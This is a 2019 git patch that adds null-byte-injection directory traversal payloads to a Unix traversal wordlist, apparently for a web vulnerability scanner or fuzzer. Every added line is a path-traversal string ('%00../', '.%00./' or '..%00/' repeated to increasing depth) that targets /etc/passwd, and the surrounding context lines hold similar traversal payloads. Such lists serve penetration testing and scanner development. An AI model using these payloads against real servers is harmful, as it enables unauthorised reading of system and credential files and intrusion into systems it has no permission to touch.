From f7435a7bacc39e1c7a974a0472c87d3153cc6509 Mon Sep 17 00:00:00 2001 From: psytester Date: Wed, 10 Apr 2019 00:01:19 +0200 Subject: [PATCH] Null byte injection added This works for some HTTP server --- wordlist/vulns/dirTraversal-nix.txt | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/wordlist/vulns/dirTraversal-nix.txt b/wordlist/vulns/dirTraversal-nix.txt index f0a4ca47..b2a88a86 100644 --- a/wordlist/vulns/dirTraversal-nix.txt +++ b/wordlist/vulns/dirTraversal-nix.txt @@ -845,3 +845,27 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd .\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd .\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd +%00../etc/passwd +%00../%00../etc/passwd +%00../%00../%00../etc/passwd +%00../%00../%00../%00../etc/passwd +%00../%00../%00../%00../%00../etc/passwd +%00../%00../%00../%00../%00../%00../etc/passwd +%00../%00../%00../%00../%00../%00../%00../etc/passwd +%00../%00../%00../%00../%00../%00../%00../%00../etc/passwd +.%00./etc/passwd +.%00./.%00./etc/passwd +.%00./.%00./.%00./etc/passwd +.%00./.%00./.%00./.%00./etc/passwd +.%00./.%00./.%00./.%00./.%00./etc/passwd +.%00./.%00./.%00./.%00./.%00./.%00./etc/passwd +.%00./.%00./.%00./.%00./.%00./.%00./.%00./etc/passwd +.%00./.%00./.%00./.%00./.%00./.%00./.%00./.%00./etc/passwd +..%00/etc/passwd +..%00/..%00/etc/passwd +..%00/..%00/..%00/etc/passwd +..%00/..%00/..%00/..%00/etc/passwd +..%00/..%00/..%00/..%00/..%00/etc/passwd +..%00/..%00/..%00/..%00/..%00/..%00/etc/passwd +..%00/..%00/..%00/..%00/..%00/..%00/..%00/etc/passwd +..%00/..%00/..%00/..%00/..%00/..%00/..%00/..%00/etc/passwd